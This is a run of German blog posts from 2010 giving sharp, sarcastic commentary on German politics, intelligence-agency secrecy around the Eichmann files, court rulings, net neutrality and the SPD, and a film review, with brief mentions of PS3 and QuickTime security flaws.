Mein Stand der Dinge ist: Gaby hat die Akten freigeklagt, und da haben sie schnell eine neue Sperrerklärung erlassen. Die Dokumente, die sie dann gekriegt hat, waren zum Großteil geschwärzt. Und als wenn das nicht schon Beleidigung und Frechheit genug ist, wollten sie zusätzlich von ihr auch noch eine Geheimhaltungserklärung unterschrieben haben! Und sie haben die Sachen, die sie ihr gezeigt haben, als "Verschlusssache - nur für den Dienstgebrauch" gekennzeichnet. Das heißt, dass sie die nicht kopieren darf, nur einsehen.
So scheißt unser Staat auf seine eigenen Gesetze.
Immerhin, zwei Sachen geben sie jetzt zu:
Definitive Kenntniserlangung des Bundesnachrichtendienstes von dem Aufenthalt Eichmanns in Argentinien seit 1958. Hierzu gehören auch die Akten, die belegen, dass die Adenauer-Regierung dezidiert nicht an der Verhaftung und Auslieferung von Eichmann (und seiner Verurteilung in Deutschland) interessiert war.
Für den ersten Teil vergleiche man mal mit Wikipedia:
Im Jahr 1960 wurde er von israelischen Agenten in Argentinien entführt und anschließend nach Israel gebracht, wo ihm der Prozess gemacht wurde.
Die englische Wikipedia verweist noch auf diese Shin Bet Webseite als Quelle für die Aussage:
In 1959, the Mossad received information stating that Eichmann was living in Buenos Aires under the name Ricardo Clement.
Ihr seht schon, das passt alles hinten und vorne nicht. Bei Gaby Weber gibt es einen kurzen Text dazu. Ich hoffe ja, dass sie auch mal beispielhaft ein paar der geschwärzten Seiten hochläd, damit man sehen kann, was für eine Farce das ist.
Oh übrigens, falls jemand auf die Begründung scharf war, warum sie die Akten weiter schwärzen:
It [das Bundeskanzleramt] expressed concern that because the information had been received in confidence from other intelligence agencies, to make it public would discredit the BND.
BWAHAHAHAHAHAHA, das ist ja grotesk!
[l] Das Verfassungsblog hat einen spannenden Kommentar zum EuGH-Urteil. Das Verfassungsgericht hatte schon vor vier Jahren das Glücksspielmonopol für verfassungswidrig erklärt, aber daraus folgte nie irgendeine Konsequenz in der Realität. Die haben einfach weitergemacht. Und der EuGH hat jetzt gesagt: so geht es nicht. Der EuGH ist auch unzufrieden damit, dass das Verfassungsgericht dem Gesetzgeber immer Anleitungen gibt, wie sie ihre Verfassungsfeindlichkeit so umbiegen können, dass es gerade noch durchgeht. (Danke, Anne)

Sat Sep 4 2010

[l] Wer dachte, dieser de Maiziere ist weniger übel als sein Vorgänger, der sieht sich getäuscht. Auch de Maiziere hat Pläne für das Unterwandern des Trennungsgebot zwischen Polizei und Diensten:
Das Bundeskriminalamt und der Bundesverfassungsschutz sollen künftig enger zusammenarbeiten. Nach dem Willen von Innenminister de Maizière sollen zunächst Führungskräfte beider Behörden rotieren. Der Bund Deutscher Kriminalbeamter reagiert "irritiert" auf die Pläne.
Personalrotation! Ist ja krass. Das mit den Führungskräften glaube ich denen nicht eine Sekunde lang, seit ich von einer Kriminaloberkommissarin als Zeuge vernommen wurde. Das klingt nach Führungskraft, oder nicht? Die hat da ganz normalen Zeugen-Vernehmen-Dienst an der Schreibmaschine gemacht.
[l] Oh Graus! Das Landgericht Hamburg hat Youtube als ~~Trollwiese~~ Betätigungsfeld entdeckt.
Das Landgericht ging laut einer Mitteilung der Hamburger Justizbehörden davon auch, dass sich YouTube die von den Nutzern ihrer Plattform hochgeladenen Inhalte zu Eigen gemacht hat. Daraus folgten "erhöhte Prüfpflichten" im Hinblick auf die Inhalte der Videos, denen die Google-Tochter nach Auffassung der den Fall behandelnden Kammer nicht nachgekommen ist.
Das klingt ja verdächtig nach der bei den Forenhaftungs-Klagen zur Schau gestellten Weltanschauung des LG Hamburg. Na super. Grasen die jetzt alle möglichen "zu Eigen machen" Anwendungsmöglichkeiten der Reihe nach ab, bis im Internet kein Stein mehr steht? Das kann ja nicht mehr lange dauern, bis sie Abgeordnetenwatch zumachen oder den E-Petitions-Server des Bundestags zumachen.
Hoffentlich hat Google mitgekriegt, dass Karlsruhe die ganzen LG-Hamburg-Entscheidungen jeweils wieder gekippt hat, wenn jemand Revision eingereicht hat.
[l] Der Mossad rekrutiert wohl gerade in den USA Araber, indem sie sich als CIA ausgeben. Die Amis sind nur eingeschränkt begeistert.
Die CIA hat neulich ne Umfrage gemacht, welche befreundeten Geheimdienste sich am freundschaftlichsten verhalten.
“Israel came in dead last,” a recently retired CIA official told me the other day.
Not only that, he added, throwing up his hands and rising from his chair, “the Israelis are number three, with China number one and Russia number two,” in terms of how aggressive they are in their operations on U.S. soil.
Überraschung!

Thu Sep 2 2010

[l] Oh wow, exzellenter Hack: Der PS3-Hack funktioniert mitnichten unter Ausnutzung eines internen Debug-Hooks von Sony, wie zuerst angenommen. Vielmehr hat Sony da Buffer Overflows in ihrem USB-Code! Da warte ich ja seit Jahren drauf, dass das mal jemand exploitet. Denn in den meisten Threat Models taucht USB nicht als Angriffsvektor auf. Stellvertretend gebe ich mal eine Begründung wieder, die ich mal gehört habe: wenn jemand an deinen USB rankommt, ist das ein physischer Angriff, der könnte ja auch 50000 Volt an deine Hardware anlegen, und da kann man sich auch nicht in Software gegen wehren, daher betrachten wir USB nicht als Angriff.
Ich sehe das anders, der CCC auch. Wir haben z.B. beim Wahlstift damit argumentiert, dass jemand einen USB Exploit fahren könnte. Solange man auch mit Windows-Autostart ans Ziel kommt, lohnt sich das natürlich nicht, da groß rumzuforschen, aber die Zeiten sind mit Windows 7 auch vorbei. Da kommt dann ein Popup, der einen explizit fragt, ob man den Autostart-Kram ausführen oder das Medium browsen will. Um da reinstecken-und-kisten-ownen zu kriegen, muss man schon den USB-Stack oder einen USB-Treiber angreifen. Das ist der erste mir bekannte Fall, wo das mal jemand gemacht hat. Daher: Hut ab! Respekt!

Wed Sep 1 2010

[l] Tony Blair hat seine Memoiren geschrieben und wenig überraschend entsprechen sie dem üblichen Muster "ich habe alles richtig gemacht, bis DER TYP DA kam und alles kaputtmachte!1!!"
[l] Erinnert ihr euch an den Fall Ian Tomlinson? Das war ein G20-Demonstrant, der von einem Polizisten spontan von hinten geschubst wurde, hinfiel, und später verstarb. Eine Autopsie sollte klären, ob es eine Verbindung gab, aber der Amtsarzt hat da wohl großflächig verkackt. So großflächig, dass er jetzt von der Ärztekammer des Fehlverhaltens schuldig gesprochen wurde. Leider schreiben sie da nicht, was er tatsächlich konkret falsch gemacht hat, aber es muss wohl ziemlich übel gewesen sein, wenn er von seinen Kollegen so bloßgestellt wird.

Tue Aug 31 2010

[l] Hahaha, oh Mann, Sicherheitslücke des Tages: Quicktime hat sein 9+ Jahren einen unbenutzten Parameter namens "_Marshaled_pUnk". Wer schonmal Windows-Programmierung gemacht hat, und sich rudimentär mit Sicherheitslücken auskennt, für den reicht das für eine Packung gute Laune. Der Rest kann sich mal den Artikel durchlesen.

Sat Aug 28 2010

[l] Ich habe mir heute Expendables im Kino angeschaut. Das ist kein wirklich schlechter Film, aber man hätte so viel mehr aus den Stars machen können. Ich will das mal daran illustrieren, dass sie da Jet Li haben, und ihn dann mit Maschinenpistolen schießen lassen. Es gab auch zwei Szenen, wo er mal kurz ein bisschen Martial Arts zeigen durfte, aber nichts befriedigendes. Ansonsten werden alle Stereotypen erfüllt, inklusive Eric Roberts als Bad Guy. Die zweite Hälfte des Filmes ist im Wesentlichen eine Dauerexplosion. Trotzdem war A-Team vom Genre her das gleiche und ein deutlich besserer Film.
Wenn ich einen Film mit dem Cast hätte machen sollen, hätte ich als Gegner nicht eine endlose Reihe von gesichtslosen Soldaten und Söldnern genommen, mit einem offensichtlichen Koloss von einem Wrestler als Boss-Gegner, sondern jeder im Team Good Guys hätte einen ordentlichen Gegner in seiner Disziplin gekriegt. Der wäre dann vorher auf einen anderen aus dem Team Good Guys getroffen und wäre klar überlegen gewesen, und Team Good Guys holt dann den Experten ran und der wuppt das dann. Aber so haben da zwar alle ordentlich Wumms gemacht, aber die waren auch alle irgendwie austauschbar. Jason Statham rockt mal wieder fettestens, aber das weiß man ja eh, dass der rockt. Stallone muss man anrechnen, dass er sich selbst nicht als Ober-Macho inszeniert hat, sondern als einziger an einer Stelle "I just got my ass kicked" einräumt. Dazu gehört in so einem Action-Kracher was und dafür hat er meinen Respekt.
Zu meiner schlechten Laune hat auch beigetragen, dass ich das im Sony Center Berlin geguckt habe, weil es da in Originalfassung läuft, und die mich da ernsthaft eine dreiviertel Stunde lang Werbung haben gucken lassen, bevor der Film endlich losging. Was für eine Frechheit. Und da wundert sich noch irgendjemand, dass die Leute lieber Raubkopien gucken oder bis zur DVD warten. Auf einer Skala von 1 bis 10 würde ich dem Film eine 7 geben. Gut, aber nicht exzellent.
Die Auftritte von Arnold und Bruce Willis sind nur kurze Cameos. Und aus meiner Sicht hätte man sich auch Mickey Rourke sparen können, der hat nichts beigetragen. Der Versuch, dem korrupten Insel-Diktator Garza (David Zayas) ein bisschen Tiefe zu geben, indem er plötzlich Reue hat, sein Land an den fiesen Rogue CIA Drogenschmuggler (Eric Roberts) verkauft zu haben, hat mich nicht überzeugen können. Auch der Seitenplot mit Charisma Carpenter, um Jason Statham Tiefe zu geben, war ein Schuß in den Ofen. Ich denke mal, dass ihnen Fokusgruppen-Tests gesagt haben, dass die Charaktere alle tumbe Stereotypen sind, und sie dann halt noch am Skript geschraubt haben. Das ist ein Actionfilm, das soll so! A-Team steht dazu, dass die Charaktere alle Karikaturen und Stereotype sind, und ist u.a. daher der bessere Film.
[l] Fnord des Tages: bei englishrussia.com gibt es angebliche Fotos von UVB-76. Das ist dieser Sender hier. Die Fotos sehen aus wie das Erstbetreten des Honecker-Bunkers nach 40 Jahren verrotten, das kann ich mir nicht vorstellen, dass da noch irgendwas in Betrieb sein soll. Ich würde das daher erstmal für einen Hoax halten. Aber trotzdem haben solche Bilder ja immer einen gewissen Charme. Und hey, man weiß es ja nicht, vielleicht ist das tatsächlich UVB-76 und die neuen Signale sind von den Höhlenforschern da ausgelöst worden, die diese Fotos gemacht haben.
Update: Frank versichert mir gerade, dass das alles nur generische Bunker-Bilder sind und da nichts auf einen Sender hinweist.

Fri Aug 27 2010

[l] Bei Obama ist ja von der initialen Euphorie nicht viel übrig geblieben, weil er Guantanamo nicht zugemacht hat, weil er Whistleblower noch mehr verfolgt als seine Vorgänger, weil die Das-ist-geheim-Seuche unter ihm noch zugenommen hat, und weil er nicht abgezogen ist sondern noch mehr Soldaten geschickt hat.
Umso erstaunlicher, dass jetzt Time Magazine in einem länglichen Artikel schildert, dass die Konjunkturprogramm-Kohle anscheinend nur eine Front ist, um gute Dinge zu tun, die eh schon immer mal getan werden mussten, aber wo nie Geld für da war. Wenn man das liest, dann flammt da ein kleines bisschen Hoffnung auf, dass doch nicht alles schlecht ist mit Obama.
Mein Lieblingsteil ist auf Seite 3, über Joe Biden, der sich da persönlich auf der dafür eingerichteten Transparenzwebseite durch die Projekte klickt, und Müll rausfiltert:
So he spends hours checking in, buttering up and banging heads to keep the stimulus on track, harassing Cabinet secretaries, governors and mayors about unspent broadband funds, weatherization delays and fishy projects. He has blocked some 260 skate parks, picnic tables and highway beautifications that flunked his what-would-your-mom-think test. "Imagine they could have proved we wasted a billion dollars," Biden says. "Gone, man. Gone!"
Das brauchen wir hier auch mal. So eine Webseite, und eine Prüfung mit dem "what-would-your-mom-think" Test.

Mon Aug 23 2010

[l] Der Betreiber von stadtplandienst.de ist sauer, dass Google sie vom Markt verdrängt, und hat sich beim Kartellamt beschwert. Es gab ja mal eine Zeit, bei der ich deren Service benutzt habe, als es noch keine Alternative gab, und da habe ich nie eine Suchmaschine benutzt, um zu denen zu kommen. Insofern kann ich mir nicht vorstellen, dass die vom Kartellamt mehr als ein müdes Lächeln kriegen. Ich persönlich wäre auch zu Google Maps gewechselt, wenn deren Angebot schlechter gewesen wäre, weil Eurocities nämlich Webseiten abgemahnt hat, die ihr Kartenmaterial kopiert haben. Google Maps hingegen bietet das Einbetten explizit an. Kein Wunder also, dass Google Maps jetzt populär ist und der Stadtplandienst in der Bedeutungslosigkeit verschwindet. Das ist eben kein tragfähiges Geschäftsmodell, seine Kunden juristisch zu verfolgen. Irgendwann wird das auch die Musikindustrie merken.
Update: Ich werde gerade per Email daruaf hingewiesen: Die haben nicht nur Abmahnungen verschickt, wenn man deren Inhalte kopiert hat, sondern auch für Deep Links auf deren Inhalte. U.a. waren einige Unis betroffen, und ich erinnere mich sogar noch dunkel, damals an meiner Alma Mater davon gehört zu haben.
[l] Die Bahn war sich so sicher, dass der Berliner Senat ihnen die S-Bahn-Konzession kündigen würde, dass sie nochmal soviel Kohle rausgetragen haben, wie nur irgend möglich. Natürlich hat der eierlose Senat nicht gekündigt. Jetzt wird die Bahn sehr kreativ werden müssen, um da noch mehr Kohle rauszutragen, während sie gleichzeitig noch weniger Leistung erbringen. Gute Arbeit, lieber Senat. Das habt ihr TOLL gemacht. (Danke, Tobias)

Thu Aug 19 2010

[l] Überraschung: Wikipedia laufen die Autoren weg. Wer hat auch Lust, mit solchen Leuten zusammenzuarbeiten. Ich habe ja eine Weile überlegt, ob ich aktiv was tun sollte, aber habe mir das angeguckt und gedacht, hey, eigentlich kriegen die Leute genau das, was sie alle verdient haben. Die Autoren bekämpfen sich gegenseitig in endlosen Webforen-Besserwisser-Klugscheißer-Korinthenkacker-Sockenpuppen-Grabenkriegen, Neuautoren halten es je nach Stamina von 10 Minuten bis 2 Tage aus, bevor sie angewidert das Weite suchen, und die ganzen Nachbar-Verklager und ich-will-auch-mal-Recht-Haber sind gebunden und machen nicht anderswo Schaden. Klar, um das Weltwissen ist es ein bisschen schade, aber das kann man im Internet komplett runterladen und dezentral sichern. Damit ist meine einzige echte Sorge entkräftet, dass die Daten verloren gehen könnten.
Insofern habe ich für mich entschieden, dass das beste Vorgehen ist, die ganzen Leute da aus der Ferne dabei zu beobachten, wie sie sich gegenseitig das Leben zur Hölle machen. Irgendwann sind nur noch noch eine Handvoll übrig, und die sind vom langen Krieg entkräftet, und dann können wir verhandeln. Vorher bringt das nichts.
Ich habe mir ja neulich erklären lassen, wie das Modell der US-Wikimedia-Foundation funktioniert. Das ist ein Franchise-Unternehmen wie McDonald's. Da geht es nicht ums Weltwissen, sondern um die Vermarktung der Logo-Rechte. Die deutsche Wikimedia hat kürzlich seinen Status als Chapter der Wikimedia-Foundation verloren. Das ist halt ein Vertrag, der irgendwann ausläuft, und dann muss einer neuer gemacht werden. Der alte ist wohl Ende letzten Jahres ausgelaufen, der neue wird demnächst unterschrieben. Bei der Gelegenheit habe ich mal recherchiert, ob es eine Option wäre, sich einfach statt derer als deutsches Chapter anzumelden. Und wenn es den Amis ums Weltwissen ginge, wäre das auch eine Option gewesen, aber so war das nicht.
Daher ist aus meiner Sicht klar: die müssen alle weg. Das einzige richtige, was die je getan haben, ist die freie Lizenz für die Inhalte. Das ist gut, weil es die Welt vor dem schützt, was dieser Laden heute geworden ist. So haben wir die Option, das einfach auszusitzen, bis die "Community" an Altersschwäche verstorben sind. Und auch wenn die da 3/4 ihrer Artikel löschen, haben wir immer noch ein Backup und können das wiederherstellen.

Wed Aug 18 2010

[l] Wo bleibt eigentlich die Revolution?
Nun, laut einer Umfrage ist sie so gut wie da:
88 Prozent der Deutschen wünschen sich eine "neue Wirtschaftsordnung". Der Kapitalismus sorge weder für einen "sozialen Ausgleich in der Gesellschaft" noch für den "Schutz der Umwelt" oder einen "sorgfältigen Umgang mit den Ressourcen".
Schade nur, dass die Umfrage von der Bertelsmann-Stiftung gemacht wurde, denn damit ist klar, wohin es gehen wird: Hartz IV und Bildung kürzen, Tafelsilber verkloppen, und noch mehr Privatisierung. Wieso die überhaupt noch operieren dürfen in unserem Land, so viel Schaden, wie die schon angerichtet haben…

Tue Aug 17 2010

[l] Verschwörungsfoto des Tages: dieses Niederschlagsbild von gestern mittag. Screenshot. Der Einsender meint, im Zentrum der Kreise liegt ein amerikanisches Raketenabwehrsystem in Trokavec.
Update: das wurde nie gebaut.
Update: Tatsächlich steht natürlich wirklich etwas in der Mitte des Kreises, nämlich die Wetterstation, die diese Messungen gemacht hat. :-) (Danke, Tilman)

Sat Aug 14 2010

[l] Ich mach das nochmal als separates Blogpost, weil es so wichtig ist: die Folien zum SSL Observatory sind hervorragend. Es war ja schon länger klar, dass alles scheiße ist, aber die Folien belegen eindrucksvoll, dass es noch schlimmer ist als bisher angenommen.
Die Forschung wurde übrigens von meinen Freunden und Kollegen bei iSec Partners gemacht, die ich an dieser Stelle herzlich grüßen möchte :-)
[l] Wo wir gerade bei der SPD waren: der SPD gehen die Bundeswehrkürzungen zu weit. DER SPD! Gehen die Kürzungen bei der BUNDESWEHR ZU WEIT. Unglaublich.
Und jetzt: hinsetzen. Das kann man nur im Sitzen lesen:
"Wir melden uns damit von den Zusagen im Bündnis ab“, sagte der verteidigungspolitische Sprecher der SPD-Bundestagsfraktion, Rainer Arnold. „Das entspricht nicht den Interessen und der Rolle Deutschlands. Die Fähigkeiten zur Bündnisverteidigung müssen bestehen bleiben.“ Auch reiche der geplante Umfang nicht aus, um mehrere größere Auslandseinsätze gleichzeitig bestreiten zu können.
Was zur Hölle?! Mehrere größere Auslandseinsätze!!
War das nicht mal so, dass die CDU die fiesen militaristischen Kriegstreiber waren, die die Wahlkampfspenden von den Rüstungskonzernen gekriegt haben und dafür immer schön staatliche Mittel für Rüstung lockergemacht haben? Oder bilde ich mir das ein und die Sozis waren auch immer Kriegstreiber? Vielleicht war ich noch zu jung vor Kohl, aber meine Erinnerung war immer, dass die Militarisierung der Sozis erst mit Schröder losging, und das war ja auch für die Grünen der Sündenfall, von dem sie sich nie erholen werden. (Danke, Benedikt)
[l] Lacher des Tages: Björn Böhning reagiert auf meine Ausführungen zu seiner "Die SPD ist doch wählbar für Netzbewohner" PR-Kampagne.
Ich befürchte fefe hat Bündnisarbeit nicht verstanden. So retten wir die Netzneutralität sicher nicht. #pronetz
Jemand von der SPD (!!) will mir was über Bündnisarbeit erzählen! HAHAHAHA! Liebe SPD, ihr habt jahrelang konsequent gegen meine Interessen abgestimmt. Vorratsdatenspeicherung, SWIFT-Abkommen, Internetzensur, Cybercrime-Convention, Hackertoolverbot, BKA-Gesetz, E-Personalausweis. Jede schlechte Idee habt ihr systematisch aufgegriffen, noch schlimmer gemacht, und dann dafür gestimmt. Und jetzt wollt ihr mir erzählen, euch ginge es um die Rettung der Netzneutralität! Dass ich nicht lache.
Nee, Leute, ihr habt Netzpolitik auf Jahrzehnte verkackt. Ihr könnt uns nicht jahrelang ins Gesicht lügen und in den Rücken dolchen und dann erwarten, dass wir euch glauben, dass ihr die Netzneutralität retten wollt.
Ich für meinen Teil glaube auch nicht, dass das taktisch auch nur kurzfristig sinnvoll ist, überhaupt auch nur ein Gespräch mit euch zu führen. Ihr seid das Problem, nicht die Lösung. Ihr müsst völlig in der Bedeutungslosigkeit verschwinden, bevor sich etwas verbessern kann. Glücklicherweise ist der Prozess ja schon relativ weit fortgeschritten und nicht mehr aufzuhalten.
Update: Die Liste erhebt keinen Anspruch auf Vollständigkeit. Da fehlen mindestens noch das Mautdebakel, die Gesundheitskarte, die Hartz-IV-Schnüffelsache und die Wahlcomputer.
[l] Mich fragen Leute, wieso ich nichts zu der Initiative Pro Netzneutralität geschrieben habe. Ich war eingeladen, Erstunterzeichner zu werden. Habe ich nicht gemacht. Nicht weil ich gegen Netzneutralität bin, sondern weil ich a) sowas wenn dann über den CCC mache und b) mir das ein bisschen zu viel Text ist bei denen. Ich fand deren Text nicht konsensfähig, ehrlich gesagt. Mich stört da z.B., dass da ständig barrierefrei steht. Klar, Barrierefreiheit ist ein nobles Ziel, aber es ist nicht Netzneutralität. Der Text ist mir auch ansonsten zu schwafelig und liest sich für mich wie ein Komitee-Entwurf, wo am Ende das halbe Parteiprogramm noch mit reingenommen wurde.
Das ist auch mein Hauptproblem mit der Initiative: das riecht für mich so, als sei das der Rehabilitierungsversuch der SPD. Die tun einfach so, als sei nichts gewesen, als hätte es die Internetsperren-Sache nie gegeben. Laut Impressum ist Björn Böhning von der SPD Betreiber der Webseite. Tut mir leid, Björn, aber die SPD hat bei mir verschissen bis in die Steinzeit. Ihr könnt jetzt nicht einfach kommen und Netzneutralität fordern und alles ist wieder gut. Euch glaube ich kein Wort mehr, nie wieder.
Auch ansonsten riecht das alles nach Komiteekonsens, z.B. das hier:
Netzneutralität fördert die Entfaltung kreativer und ökonomischer Potentiale und sichert damit das Innovationspotential des Internets.
Da sieht man deutlich, dass die Alten Herren immer noch nicht verstanden haben, worum es beim Internet geht. Das Internet ist kein Shopping-Kanal. Scheiß auf die ökonomischen Potentiale. Es geht bei Netzneutralität auch nicht um Innovationspotential. Netzneutralität ist die Grundlage für Demokratie, Pluralismus und Meinungsbildung im Internet. Das ist eine viel fundamentalere Sache als irgendwelche wirtschaftlichen Blubberblasen.
In dem Text geht es auch gleich so weiter:
Die Innovationsfähigkeit der Wirtschaft wird gestärkt wenn Entwicklungen frei online verfügbar sind
Da kommt mir das Mittagessen hoch. Das klingt wie eine Bittschrift an die Wirtschaft, sie möge uns doch bitte erlauben, in ihrem Internet noch ein bisschen weiter zu spielen. Nein, nein, nein, so läuft das nicht. Das ist unser Internet, das ihr da für euer Online-Shopping benutzt. Nicht euer Shopping-Internet, das wir auch für unsere Meinungsbildung benutzen. Kriegt das mal in eure Schädel rein. Dann können wir reden.
Und das Gefasel über die digitale Spaltung, tut mir leid, das kann ich alles nicht ernstnehmen. Die SPD und die Grünen sind in diversen Landesregierungen am Start, und was haben die dort dafür getan, dass jeder Breitband-Internet kriegt? Nichts! Da wird immer abgewiegelt und auf die Telekom gezeigt. Und jetzt stellt ihr euch hin und fordert das im Nebensatz bei der Netzneutralität mit, um zu simulieren, als sei das schon immer euer Thema gewesen. Das ist unehrlich und ich kann mich da unmöglich in die Jubelperser einreihen.
Netzneutralität sichert somit den Zugang zu Wissen und Informationen unabhängig von Herkunft, Aufenthaltsort, Einkommen, sozialer Schicht und ökonomischer Leistungsfähigkeit.
Schon wieder nicht verstanden! Netzneutralität sichert nicht nur den Zugang zu Wissen, Netzneutralität sichert, dass ICH mich im Internet frei äußern kann und die Leute das auch lesen können. Das Internet ist eben kein Rundfunk, wo eine Hand voll Sender senden und der Rest soll bitte schön empfangen dürfen. Das Internet erlaubt mir, dass ich meine Meinung sagen kann, auch wenn ich nur ein kleines unwichtiges Würstchen bin, und das ehemalige Nachrichtenmagazin kann nicht durch Mauscheleien mit der Telekom dafür sorgen, dass die Telekom meine Inhalte nicht oder nur tröpfenweise durchlässt. Ich habe langsam den Eindruck, die Alten Herren in den Parlamenten werden diesen Punkt nie begreifen. Das Internet ist nicht bloß ein Empfangsmedium. Das Internet ist ein Sendemedium. Jeder kann senden. Netzneutralität soll garantieren, dass niemand anderes meine Sendung unterdrücken kann, nur weil er mehr Geld hat.
Dieses ganze Gefasel von Innovationen, Wirtschaft, Barrierefreiheit und digitaler Spaltung geht voll am Thema vorbei.
[l] Die Russen wollen dann am 21. August anfangen, Uran in den Bushehr-Reaktor im Iran zu laden. Sanktionen, Schmanktionen, wenn die anderen nicht liefern, dann machen wir halt den Reibach :-)
Money Quote:
Moscow has cited technical reasons for the delays. But Bushehr has also been an ideal way to gain leverage with both Tehran and Washington.
Bwahahahaha, man muss sie doch lieben, die Russen. Da wird Politik von Leuten gemacht, die sich mit sowas auskennen.

Mon Aug 9 2010

[l] Die Internet-Schnüffelbehörde in der Schweiz scheint auffallend inkompetent zu sein. Money Quote:
Der ÜPF sei technisch «völlig inkompetent», sagt einer der Briefempfänger. «Die technischen Überwachungsrichtlinien sind nicht vollständig und nicht miteinander kompatibel.» Es sei, als ob jemand bei einem Schreiner einen Tisch auf ein bestimmtes Datum hin bestelle, aber nicht sage, wie gross und aus welchem Holz dieser gemacht werden solle. «Sitzungen mit dem ÜPF zu technischen Fragen sind Veranstaltungen voll unfreiwilliger Komik», sagt ein weiterer Insider.
Bwahahahahaha
[l] Zu der Radioaktivität-in-Berlin Geschichte gestern: Frank ist da mal hingefahren und coole Fotos gemacht. Für dieses exemplarische Stück Lokaljournalismus darf er sich auch das Twitter-Topic aussuchen, und er möchte gerne #Stargardobyl :-)

Fri Aug 6 2010

[l] Die "Zeit" greift in Zeiten sinkender Leserzahlen zum billigen Trolling, in feineren Kreisen "Op-Ed" genannt, wo dann ganz brutaler Meinungsjournalismus betrieben wird, am besten in Form einer krassen Außenseitermeinung, um für Kontroverse zu sorgen. Anders kann ich mir jedenfalls nicht erklären, wie dieses widerwärtige Verfassungsgerichts-Bashing ihren Weg in die "Zeit" finden konnte. Ich erinnere mich noch an Zeiten, als die "Zeit" das liberale Gegenstück zur FAZ war und für Qualitätsjournalismus stand.
In diesem Artikel vertritt Herr Professor Tomuschat die Auffassung, das Verfassungsgericht solle sich mal nicht so haben mit der Verfassung und den Menschenrechten und das Parlament mal machen lassen, und dass die EU undemokratisch ist, das sei ja wohl auch kein Ding. Da hat er natürlich nicht völlig unrecht, das ist ein relativ neues Phänomen, dass Deutschland auf Rudimenten von Demokratie besteht. Die Kommentare zu dem Op-Ed sind dann auch alles andere als freundlich.
Übrigens, Herr Tomuschat hat einen Wikipedia-Artikel, und wenn man da den Links hinterher läuft, findet man diese Seite. Dort liest sich das so, als habe Tomuschat für Daimler ein Gutachten gemacht, und zwar in dem Fall mit Mercedes Argentinien und dort während der Diktatur verschwundenen Betriebsräten. Das Gutachten war wohl eher kontrovers — jedenfalls ist Tomuschat danach mit Farbbeuteln beworfen worden.
Und so passt mal wieder alles wie Arsch auf Eimer.
Update: Tomuschat war auch 2009 Prozessbevollmächtigter der Bundesregierung unter Schäuble, der ja einen Großteil der jetzt bemängelten Entscheidungen gefressen hat. Insofern sieht das sehr nach "schlechter Verlierer" aus gerade.
Update: Die "Zeit" publiziert auch gleich die Gegendarstellung, von Burkhard Hirsch. (Danke, Erhard)

Thu Aug 5 2010

[l] Lacher des Tages: obskure "Al-Kaida"-Splittergruppe sagt, sie hätten den Tankerangriff gemacht. Riiiiight.
The Brigades of Abdullah Azzam, in a statement, said it carried out the attack "to weaken the infidel global order which is thrust unto Muslim lands and which loots its resources".
Nee, klar. Weil das ja auch voll wie ne Explosion aussah. Besonders schön auch, wie der IT-Spezialist von denen das Tankerfoto (auf dem man die Beule nicht sieht) als Bildschirmhintergrund von seinem Windows gesetzt hat, und da Icons und Widgets drüber sind. m( (Danke, Thomas)

Wed Aug 4 2010

[l] Westerwelle findet, dass die NATO-Todesschwadrone und ihre "gezielten Tötungen" rechtens sind.
Deutsche Soldaten sind demnach an der Erstellung von NATO-Fahndungslisten beteiligt, die auch in ISAF-Operationen mit gezielten Tötungsabsichten münden können. Deutschland schreibe die Personen aber nur zur Gefangennahme aus und sei nicht an der gezielten Tötung beteiligt.
Na DANN ist ja gut. Wenn wir uns nicht selbst die Hände schmutzig machen, sondern das die Todesschwadrone der anderen Länder machen lassen. Dann ist das natürlich viel weniger anstößig!1!!
Update: Kurzer historischer Hinweis noch: genau so haben das die Nazis gemacht mit ihrer Rechtfertigung. Die haben immer zur Verhaftung ausgeschrieben und dann sind die Leute immer "auf der Flucht erschossen" worden. Und so sah es nicht auf den ersten Blick wie ein politischer Mord oder eine "gezielte Tötung" (was für ein Ausdruck!) aus.

Fri Jul 30 2010

[l] Das ehemalige Nachrichtenmagazin hat ein interessantes Interview mit Craig Venter gemacht. Wem der Name nichts sagt: erst die Biografie durchlesen.

Thu Jul 29 2010

[l] Schlagzeile des Tages: "Naked trampoline man avoids jail sentence".
Ein 55jähriger Mann hat nachts um 5 (FÜNF UHR NACHTS!!) in seinem Garten nackt auf seinem Trampolin gehüpft, und dabei in der einen Hand eine Zigarette und in der anderen sein Gemächt gehalten. Und anstatt den in Ruhe zu lassen oder ihm einen Orden umzuhängen hat ihn eine Nachbarin gesehen und angezeigt. Angezeigt!! Weil er in seinem eigenen Garten Spaß hatte! Meine Güte. Und die haben sich tatsächlich nicht entblödet, ihn zu fragen, warum er das gemacht hat.
Asked why he did it, Burden told officers: "Just for the thrill of it."
No Shit, Sherlock!
Und weil das ja der Wahrheitsfindung dient, hat die BBC sein Foto ins Internet gestellt. Tolle Wurst!
[l] Was zum Lachen: Deutschlandfunk-Interview mit Horst Teltschik. Das ist einer der alten Kohl-Apparatschiks, der sich seit vielen Jahren als Fachmann für Sicherheitsfragen zu positionieren versucht und da auch eine Konferenz in München gemacht hat. Den haben sie zu Wikileaks befragt, und er wirkt da schon fast in Panik. Money Quote 1:
Man muss sich doch generell fragen: Was bleibt denn überhaupt heute noch geheim? Ob das jetzt im Kriegsfall ist, ob das Bankenkonten sind, was immer.
Das war ja zu erwarten, dass das die Hauptbefürchtung der CDU ist, dass ihre schwarzen Konten auffliegen könnten :-)
Money Quote 2:
Wie wollen Sie denn noch geheime Aktionen durchführen, wie will Politik oder Militär strategische, taktische Entscheidungen vorbereiten, wenn man heute immer damit rechnen muss, dass es irgendwo jemanden gibt, der über elektronische Instrumente solche Informationen vermarktet? Das mag zwar die Öffentlichkeit interessieren, die Politik ist nur aufgefordert und das Militär ist aufgefordert, nur das zu tun, was rechtens ist, denn sie müssen heute - und darin liegt, wenn Sie so wollen, der Vorteil der Veröffentlichung - damit, wenn es öffentlich wird, auch akzeptabel bleiben.
Äh… das erinnert ein bisschen an Loriots grandiose Rede. *verhaspel* *stammel* Und er hat ja völlig Recht! Das ist ja eine Schande, wenn sich Politik und Militär plötzlich nur noch rechtens verhalten dürfen!1!! (Danke, atoth)

Wed Jul 28 2010

[l] Lest euch mal bitte diesen Artikel durch. Es geht um ein Experiment, das sie in den 80er Jahren in Tennessee gemacht haben. Da wollten sie rausfinden, wie viel Einfluß ein guter Kindergarten-Lehrer auf die Entwicklung hat. Sie haben rausgefunden, dass Kinder da deutlich mehr von einem guten Lehrer lernen können, aber dass die Unterschiede sich in der Grundschule wegnivellieren.
